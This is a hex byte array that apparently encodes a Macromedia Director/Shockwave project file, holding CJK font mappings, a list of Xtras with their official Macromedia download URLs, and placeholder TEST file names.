0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x4F, 0x73, 0x61, 0x6B, 0x61, 0x20, 0x4D, 0x61, 0x70, 0x20,
0x4E, 0x6F, 0x6E, 0x65, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0xE6, 0xA8, 0x99, 0xE6, 0xBA, 0x96,
0xE3, 0x82, 0xB4, 0xE3, 0x82, 0xB7, 0xE3, 0x83, 0x83, 0xE3, 0x82, 0xAF, 0x22, 0x20, 0x20, 0x3D,
0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x4F, 0x73, 0x61, 0x6B, 0x61, 0x20, 0x4D, 0x61, 0x70, 0x20,
0x4E, 0x6F, 0x6E, 0x65, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0xE6, 0xA8, 0x99, 0xE6, 0xBA, 0x96,
0xE6, 0x98, 0x8E, 0xE6, 0x9C, 0x9D, 0x22, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20,
0x4D, 0x61, 0x63, 0x3A, 0x4F, 0x73, 0x61, 0x6B, 0x61, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F,
0x6E, 0x65, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0xE6, 0x98, 0x8E, 0xE6, 0x9C, 0x9D, 0x22, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A,
0x4F, 0x73, 0x61, 0x6B, 0x61, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x0D, 0x0D,
0x3B, 0x20, 0x4B, 0x6F, 0x72, 0x65, 0x61, 0x6E, 0x20, 0x46, 0x6F, 0x6E, 0x74, 0x20, 0x4D, 0x61,
0x70, 0x70, 0x69, 0x6E, 0x67, 0x73, 0x0D, 0x4D, 0x61, 0x63, 0x3A, 0x41, 0x70, 0x70, 0x6C, 0x65,
0x47, 0x6F, 0x74, 0x68, 0x69, 0x63, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x57, 0x69,
0x6E, 0x3A, 0x22, 0xEA, 0xB5, 0xB4, 0xEB, 0xA6, 0xBC, 0x22, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E,
0x6F, 0x6E, 0x65, 0x0D, 0x4D, 0x61, 0x63, 0x3A, 0x53, 0x65, 0x6F, 0x75, 0x6C, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x57, 0x69, 0x6E, 0x3A, 0x22,
0xEA, 0xB6, 0x81, 0xEC, 0x84, 0x9C, 0x22, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65,
0x0D, 0x4D, 0x61, 0x63, 0x3A, 0x41, 0x70, 0x70, 0x6C, 0x65, 0x4D, 0x79, 0x75, 0x6E, 0x67, 0x69,
0x6F, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0xEB, 0x8F, 0x8B,
0xEC, 0x9B, 0x80, 0x22, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x0D, 0x4D, 0x61,
0x63, 0x3A, 0x22, 0xED, 0x95, 0x9C, 0xEA, 0xB0, 0x95, 0xEC, 0xB2, 0xB4, 0x22, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0xEB, 0xB0, 0x94,
0xED, 0x83, 0x95, 0x22, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x0D, 0x0D, 0x57,
0x69, 0x6E, 0x3A, 0x22, 0xEA, 0xB5, 0xB4, 0xEB, 0xA6, 0xBC, 0x22, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x41, 0x70, 0x70, 0x6C,
0x65, 0x47, 0x6F, 0x74, 0x68, 0x69, 0x63, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65,
0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0xEA, 0xB5, 0xB4, 0xEB, 0xA6, 0xBC, 0xEC, 0xB2, 0xB4, 0x22,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x41,
0x70, 0x70, 0x6C, 0x65, 0x47, 0x6F, 0x74, 0x68, 0x69, 0x63, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E,
0x6F, 0x6E, 0x65, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0xEA, 0xB6, 0x81, 0xEC, 0x84, 0x9C, 0x22,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63,
0x3A, 0x53, 0x65, 0x6F, 0x75, 0x6C, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x0D,
0x57, 0x69, 0x6E, 0x3A, 0x22, 0xEA, 0xB6, 0x81, 0xEC, 0x84, 0x9C, 0xEC, 0xB2, 0xB4, 0x22, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x53, 0x65,
0x6F, 0x75, 0x6C, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x0D, 0x57, 0x69, 0x6E,
0x3A, 0x22, 0xEB, 0x8F, 0x8B, 0xEC, 0x9B, 0x80, 0x22, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x41, 0x70, 0x70, 0x6C, 0x65, 0x4D,
0x79, 0x75, 0x6E, 0x67, 0x69, 0x6F, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x0D,
0x57, 0x69, 0x6E, 0x3A, 0x22, 0xEB, 0x8F, 0x8B, 0xEC, 0x9B, 0x80, 0xEC, 0xB2, 0xB4, 0x22, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x41, 0x70,
0x70, 0x6C, 0x65, 0x4D, 0x79, 0x75, 0x6E, 0x67, 0x69, 0x6F, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E,
0x6F, 0x6E, 0x65, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0xEB, 0xB0, 0x94, 0xED, 0x83, 0x95, 0x22,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63,
0x3A, 0x22, 0xED, 0x95, 0x9C, 0xEA, 0xB0, 0x95, 0xEC, 0xB2, 0xB4, 0x22, 0x20, 0x4D, 0x61, 0x70,
0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0xEB, 0xB0, 0x94, 0xED, 0x83,
0x95, 0xEC, 0xB2, 0xB4, 0x22, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20,
0x4D, 0x61, 0x63, 0x3A, 0x22, 0xED, 0x95, 0x9C, 0xEA, 0xB0, 0x95, 0xEC, 0xB2, 0xB4, 0x22, 0x20,
0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x0D, 0x00, 0x6C, 0x52, 0x54, 0x58, 0x83, 0x04,
0x00, 0x00, 0x08, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x49, 0x00, 0x00,
0x00, 0x18, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x14,
0x00, 0x00, 0x00, 0x23, 0x06, 0x02, 0x10, 0x49, 0x4E, 0x65, 0x74, 0x55, 0x72, 0x6C, 0x20, 0x50,
0x50, 0x43, 0x20, 0x58, 0x74, 0x72, 0x61, 0x00, 0x06, 0x05, 0x0B, 0x49, 0x4E, 0x45, 0x54, 0x55,
0x52, 0x4C, 0x2E, 0x58, 0x33, 0x32, 0x00, 0x00, 0x00, 0x00, 0x49, 0x00, 0x00, 0x00, 0x18, 0x00,
0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x14, 0x00, 0x00, 0x00,
0x23, 0x06, 0x02, 0x10, 0x4E, 0x65, 0x74, 0x46, 0x69, 0x6C, 0x65, 0x20, 0x50, 0x50, 0x43, 0x20,
0x58, 0x74, 0x72, 0x61, 0x00, 0x06, 0x05, 0x0B, 0x4E, 0x45, 0x54, 0x46, 0x49, 0x4C, 0x45, 0x2E,
0x58, 0x33, 0x32, 0x00, 0x00, 0x00, 0x00, 0x4B, 0x00, 0x00, 0x00, 0x18, 0x00, 0x00, 0x00, 0x10,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x15, 0x00, 0x00, 0x00, 0x25, 0x06, 0x02,
0x11, 0x4E, 0x65, 0x74, 0x4C, 0x69, 0x6E, 0x67, 0x6F, 0x20, 0x50, 0x50, 0x43, 0x20, 0x58, 0x74,
0x72, 0x61, 0x00, 0x06, 0x05, 0x0C, 0x4E, 0x65, 0x74, 0x6C, 0x69, 0x6E, 0x67, 0x6F, 0x2E, 0x78,
0x33, 0x32, 0x00, 0x00, 0x00, 0x00, 0xCC, 0x00, 0x00, 0x00, 0x18, 0x01, 0x01, 0x01, 0x12, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1E, 0x00, 0x00, 0x00, 0x2E, 0x00, 0x00, 0x00,
0x6C, 0x00, 0x00, 0x00, 0x8A, 0x00, 0x00, 0x00, 0x9A, 0x06, 0x02, 0x1A, 0x53, 0x57, 0x41, 0x20,
0x44, 0x65, 0x63, 0x6F, 0x6D, 0x70, 0x72, 0x65, 0x73, 0x73, 0x69, 0x6F, 0x6E, 0x20, 0x50, 0x50,
0x43, 0x20, 0x58, 0x74, 0x72, 0x61, 0x00, 0x06, 0x05, 0x0C, 0x73, 0x77, 0x61, 0x64, 0x63, 0x6D,
0x70, 0x72, 0x2E, 0x78, 0x33, 0x32, 0x00, 0x01, 0x00, 0x3A, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F,
0x2F, 0x64, 0x6F, 0x77, 0x6E, 0x6C, 0x6F, 0x61, 0x64, 0x2E, 0x6D, 0x61, 0x63, 0x72, 0x6F, 0x6D,
0x65, 0x64, 0x69, 0x61, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x70, 0x75, 0x62, 0x2F, 0x73, 0x68, 0x6F,
0x63, 0x6B, 0x77, 0x61, 0x76, 0x65, 0x31, 0x31, 0x2E, 0x35, 0x2F, 0x78, 0x74, 0x72, 0x61, 0x73,
0x2F, 0x53, 0x57, 0x41, 0x00, 0x21, 0x02, 0x1A, 0x53, 0x57, 0x41, 0x20, 0x44, 0x65, 0x63, 0x6F,
0x6D, 0x70, 0x72, 0x65, 0x73, 0x73, 0x69, 0x6F, 0x6E, 0x20, 0x50, 0x50, 0x43, 0x20, 0x58, 0x74,
0x72, 0x61, 0x00, 0x41, 0x05, 0x0C, 0x73, 0x77, 0x61, 0x64, 0x63, 0x6D, 0x70, 0x72, 0x2E, 0x78,
0x33, 0x32, 0x00, 0x00, 0x00, 0x00, 0x96, 0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x01, 0x12, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x13, 0x00, 0x00, 0x00, 0x59, 0x00, 0x00, 0x00,
0x6C, 0x06, 0x05, 0x0F, 0x44, 0x69, 0x72, 0x65, 0x63, 0x74, 0x53, 0x6F, 0x75, 0x6E, 0x64, 0x2E,
0x78, 0x33, 0x32, 0x00, 0x01, 0x00, 0x42, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x64, 0x6F,
0x77, 0x6E, 0x6C, 0x6F, 0x61, 0x64, 0x2E, 0x6D, 0x61, 0x63, 0x72, 0x6F, 0x6D, 0x65, 0x64, 0x69,
0x61, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x70, 0x75, 0x62, 0x2F, 0x73, 0x68, 0x6F, 0x63, 0x6B, 0x77,
0x61, 0x76, 0x65, 0x31, 0x31, 0x2E, 0x35, 0x2F, 0x78, 0x74, 0x72, 0x61, 0x73, 0x2F, 0x44, 0x69,
0x72, 0x65, 0x63, 0x74, 0x53, 0x6F, 0x75, 0x6E, 0x64, 0x00, 0x41, 0x05, 0x0F, 0x44, 0x69, 0x72,
0x65, 0x63, 0x74, 0x53, 0x6F, 0x75, 0x6E, 0x64, 0x2E, 0x78, 0x33, 0x32, 0x00, 0x00, 0x00, 0x00,
0xC5, 0x00, 0x00, 0x00, 0x18, 0x01, 0x01, 0x01, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x26, 0x00, 0x00, 0x00, 0x6D, 0x00, 0x00, 0x00, 0x7E, 0x00,
0x00, 0x00, 0x93, 0x06, 0x02, 0x0D, 0x53, 0x6F, 0x75, 0x6E, 0x64, 0x20, 0x43, 0x6F, 0x6E, 0x74,
0x72, 0x6F, 0x6C, 0x00, 0x06, 0x05, 0x11, 0x53, 0x6F, 0x75, 0x6E, 0x64, 0x20, 0x43, 0x6F, 0x6E,
0x74, 0x72, 0x6F, 0x6C, 0x2E, 0x78, 0x33, 0x32, 0x00, 0x01, 0x00, 0x43, 0x68, 0x74, 0x74, 0x70,
0x3A, 0x2F, 0x2F, 0x64, 0x6F, 0x77, 0x6E, 0x6C, 0x6F, 0x61, 0x64, 0x2E, 0x6D, 0x61, 0x63, 0x72,
0x6F, 0x6D, 0x65, 0x64, 0x69, 0x61, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x70, 0x75, 0x62, 0x2F, 0x73,
0x68, 0x6F, 0x63, 0x6B, 0x77, 0x61, 0x76, 0x65, 0x31, 0x31, 0x2E, 0x35, 0x2F, 0x78, 0x74, 0x72,
0x61, 0x73, 0x2F, 0x53, 0x6F, 0x75, 0x6E, 0x64, 0x43, 0x6F, 0x6E, 0x74, 0x72, 0x6F, 0x6C, 0x00,
0x21, 0x02, 0x0D, 0x53, 0x6F, 0x75, 0x6E, 0x64, 0x20, 0x43, 0x6F, 0x6E, 0x74, 0x72, 0x6F, 0x6C,
0x00, 0x41, 0x05, 0x11, 0x53, 0x6F, 0x75, 0x6E, 0x64, 0x20, 0x43, 0x6F, 0x6E, 0x74, 0x72, 0x6F,
0x6C, 0x2E, 0x78, 0x33, 0x32, 0x00, 0x00, 0x00, 0x00, 0x91, 0x00, 0x00, 0x00, 0x18, 0x00, 0x01,
0x01, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x57,
0x00, 0x00, 0x00, 0x67, 0x06, 0x02, 0x0C, 0x43, 0x6F, 0x72, 0x65, 0x41, 0x75, 0x64, 0x69, 0x6F,
0x4D, 0x69, 0x78, 0x00, 0x01, 0x00, 0x43, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x64, 0x6F,
0x77, 0x6E, 0x6C, 0x6F, 0x61, 0x64, 0x2E, 0x6D, 0x61, 0x63, 0x72, 0x6F, 0x6D, 0x65, 0x64, 0x69,
0x61, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x70, 0x75, 0x62, 0x2F, 0x73, 0x68, 0x6F, 0x63, 0x6B, 0x77,
0x61, 0x76, 0x65, 0x31, 0x31, 0x2E, 0x35, 0x2F, 0x78, 0x74, 0x72, 0x61, 0x73, 0x2F, 0x43, 0x6F,
0x72, 0x65, 0x41, 0x75, 0x64, 0x69, 0x6F, 0x4D, 0x69, 0x78, 0x00, 0x21, 0x02, 0x0C, 0x43, 0x6F,
0x72, 0x65, 0x41, 0x75, 0x64, 0x69, 0x6F, 0x4D, 0x69, 0x78, 0x00, 0x00, 0x00, 0x00, 0xC6, 0x00,
0x00, 0x00, 0x18, 0x01, 0x01, 0x01, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x11, 0x00, 0x00, 0x00, 0x26, 0x00, 0x00, 0x00, 0x6E, 0x00, 0x00, 0x00, 0x7F, 0x00, 0x00, 0x00,
0x94, 0x06, 0x02, 0x0D, 0x42, 0x69, 0x74, 0x6D, 0x61, 0x70, 0x46, 0x69, 0x6C, 0x74, 0x65, 0x72,
0x73, 0x00, 0x06, 0x05, 0x11, 0x42, 0x69, 0x74, 0x6D, 0x61, 0x70, 0x46, 0x69, 0x6C, 0x74, 0x65,
0x72, 0x73, 0x2E, 0x78, 0x33, 0x32, 0x00, 0x01, 0x00, 0x44, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F,
0x2F, 0x64, 0x6F, 0x77, 0x6E, 0x6C, 0x6F, 0x61, 0x64, 0x2E, 0x6D, 0x61, 0x63, 0x72, 0x6F, 0x6D,
0x65, 0x64, 0x69, 0x61, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x70, 0x75, 0x62, 0x2F, 0x73, 0x68, 0x6F,
0x63, 0x6B, 0x77, 0x61, 0x76, 0x65, 0x31, 0x31, 0x2E, 0x35, 0x2F, 0x78, 0x74, 0x72, 0x61, 0x73,
0x2F, 0x42, 0x69, 0x74, 0x6D, 0x61, 0x70, 0x46, 0x69, 0x6C, 0x74, 0x65, 0x72, 0x73, 0x00, 0x21,
0x02, 0x0D, 0x42, 0x69, 0x74, 0x6D, 0x61, 0x70, 0x46, 0x69, 0x6C, 0x74, 0x65, 0x72, 0x73, 0x00,
0x41, 0x05, 0x11, 0x42, 0x69, 0x74, 0x6D, 0x61, 0x70, 0x46, 0x69, 0x6C, 0x74, 0x65, 0x72, 0x73,
0x2E, 0x78, 0x33, 0x32, 0x00, 0x00, 0x4C, 0x73, 0x43, 0x4D, 0x3A, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x0C, 0x00, 0x00, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, 0x00, 0x0C,
0x00, 0x00, 0x00, 0x14, 0x08, 0x49, 0x6E, 0x74, 0x65, 0x72, 0x6E, 0x61, 0x6C, 0x00, 0x00, 0x00,
0x00, 0x01, 0x00, 0x01, 0x00, 0x01, 0x04, 0x00, 0x53, 0x52, 0x45, 0x56, 0x0C, 0x00, 0x00, 0x00,
0x00, 0x02, 0x00, 0x01, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x00, 0x02, 0x51, 0x4C, 0x4F, 0x43, 0x46,
0x38, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x11,
0x11, 0x11, 0x22, 0x22, 0x22, 0x33, 0x33, 0x33, 0x44, 0x44, 0x44, 0x55, 0x55, 0x55, 0x66, 0x66,
0x66, 0x77, 0x77, 0x77, 0x88, 0x88, 0x88, 0x99, 0x99, 0x99, 0xAA, 0xAA, 0xAA, 0xBB, 0xBB, 0xBB,
0xCC, 0xCC, 0xCC, 0xDD, 0xDD, 0xDD, 0xEE, 0xEE, 0xEE, 0xFF, 0xFF, 0xFF, 0x4C, 0x42, 0x55, 0x50,
0x99, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0D, 0x00, 0x00, 0x00, 0x02, 0x9C, 0x00, 0x00, 0x02,
0x76, 0xFF, 0xFF, 0xFF, 0x0C, 0x00, 0x00, 0x00, 0x44, 0x00, 0x00, 0x00, 0x65, 0x00, 0x00, 0x00,
0x66, 0x00, 0x00, 0x00, 0x61, 0x00, 0x00, 0x00, 0x75, 0x00, 0x00, 0x00, 0x6C, 0x00, 0x00, 0x00,
0x74, 0x00, 0x00, 0x00, 0x2E, 0x00, 0x00, 0x00, 0x68, 0x00, 0x00, 0x00, 0x74, 0x00, 0x00, 0x00,
0x6D, 0x00, 0x00, 0x00, 0x6C, 0x08, 0x00, 0x00, 0x00, 0x54, 0x00, 0x00, 0x00, 0x45, 0x00, 0x00,
0x00, 0x53, 0x00, 0x00, 0x00, 0x54, 0x00, 0x00, 0x00, 0x2E, 0x00, 0x00, 0x00, 0x68, 0x00, 0x00,
0x00, 0x74, 0x00, 0x00, 0x00, 0x6D, 0x08, 0x00, 0x00, 0x00, 0x54, 0x00, 0x00, 0x00, 0x45, 0x00,
0x00, 0x00, 0x53, 0x00, 0x00, 0x00, 0x54, 0x00, 0x00, 0x00, 0x2E, 0x00, 0x00, 0x00, 0x64, 0x00,
0x00, 0x00, 0x63, 0x00, 0x00, 0x00, 0x72, 0x08, 0x00, 0x00, 0x00, 0x54, 0x00, 0x00, 0x00, 0x45,
0x00, 0x00, 0x00, 0x53, 0x00, 0x00, 0x00, 0x54, 0x00, 0x00, 0x00, 0x2E, 0x00, 0x00, 0x00, 0x6A,
0x00, 0x00, 0x00, 0x70, 0x00, 0x00, 0x00, 0x67, 0x0A, 0x00, 0x00, 0x00, 0x54, 0x00, 0x00, 0x00,
0x45, 0x00, 0x00, 0x00, 0x53, 0x00, 0x00, 0x00, 0x54, 0x00, 0x00, 0x00, 0x2E, 0x00, 0x00, 0x00,
0x63, 0x00, 0x00, 0x00, 0x6C, 0x00, 0x00, 0x00, 0x61, 0x00, 0x00, 0x00, 0x73, 0x00, 0x00, 0x00,
0x73, 0x04, 0x00, 0x00, 0x00, 0x54, 0x00, 0x00, 0x00, 0x45, 0x00, 0x00, 0x00, 0x53, 0x00, 0x00,
0x00, 0x54, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x01, 0x50, 0x01, 0x00,
0x00, 0x01, 0x01, 0x00, 0x01, 0x0D, 0x00, 0x00, 0x00, 0x73, 0x00, 0x00, 0x00, 0x77, 0x00, 0x00,
0x00, 0x43, 0x00, 0x00, 0x00, 0x6F, 0x00, 0x00, 0x00, 0x6E, 0x00, 0x00, 0x00, 0x74, 0x00, 0x00,
0x00, 0x65, 0x00, 0x00, 0x00, 0x78, 0x00, 0x00, 0x00, 0x74, 0x00, 0x00, 0x00, 0x4D, 0x00, 0x00,
0x00, 0x65, 0x00, 0x00, 0x00, 0x6E, 0x00, 0x00, 0x00, 0x75, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00,
0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x54, 0x45, 0x53,
0x54, 0x2E, 0x65, 0x78, 0x65, 0x00, 0x00, 0x00, 0x08, 0x54, 0x45, 0x53, 0x54, 0x2E, 0x61, 0x70,
0x70, 0x00, 0x00, 0x00, 0x0C, 0x54, 0x45, 0x53, 0x54, 0x2E, 0x63, 0x6C, 0x61, 0x73, 0x73, 0x69,
0x63, 0x00, 0x00, 0x00, 0x08, 0x53, 0x74, 0x61, 0x6E, 0x64, 0x61, 0x72, 0x64, 0x01, 0x00, 0x01,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x38, 0x30, 0x30, 0x30, 0x00, 0x00,
0x00, 0x00, 0x01, 0x30, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x44, 0x49,
0x52, 0x47, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x40, 0x00, 0x40, 0x00, 0x02,
0x00, 0x23, 0x00, 0x00, 0x00, 0xE6, 0x4C, 0x46, 0x44, 0x4D, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x02, 0x3A, 0x7E, 0x46, 0x52, 0x43, 0x53, 0x18, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x18, 0x00, 0x08,
0x00, 0x00, 0x00, 0x00, 0x46, 0x52, 0x43, 0x53, 0x18, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x18, 0x00, 0x08,
0x00, 0x00, 0x00, 0x00, 0x66, 0x6E, 0x69, 0x43, 0x3C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04,
0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x12, 0x00, 0x00,
0x00, 0x1A, 0x00, 0x00, 0x00, 0x1C, 0x00, 0x00, 0x00, 0x1E, 0x00, 0x01, 0x00, 0x01, 0x00, 0x03,
0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x04, 0x9F, 0x00, 0x00, 0x00, 0x00,
0x00, 0xBB, 0x05, 0x7A, 0x00, 0x00, 0x00, 0x00, 0x2A, 0x53, 0x41, 0x43, 0x04, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x04, 0x74, 0x53, 0x41, 0x43, 0x93, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08,
0x00, 0x00, 0x00, 0x76, 0x00, 0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x14, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x14, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00,
0x00, 0x0C, 0x4A, 0xB4, 0x0B, 0xEF, 0x4A, 0xB4, 0x0B, 0xEF, 0x4E, 0x2F, 0x41, 0x00, 0x00, 0x03,
0x00, 0x00, 0x00, 0x00, 0x00, 0x87, 0x00, 0xA4, 0x00, 0x01, 0xFF, 0x00, 0x01, 0x02, 0x05, 0x00,
0x58, 0x74, 0x63, 0x4C, 0x6C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x60, 0x00, 0x0C, 0x00, 0x00, 0x00, 0x00,
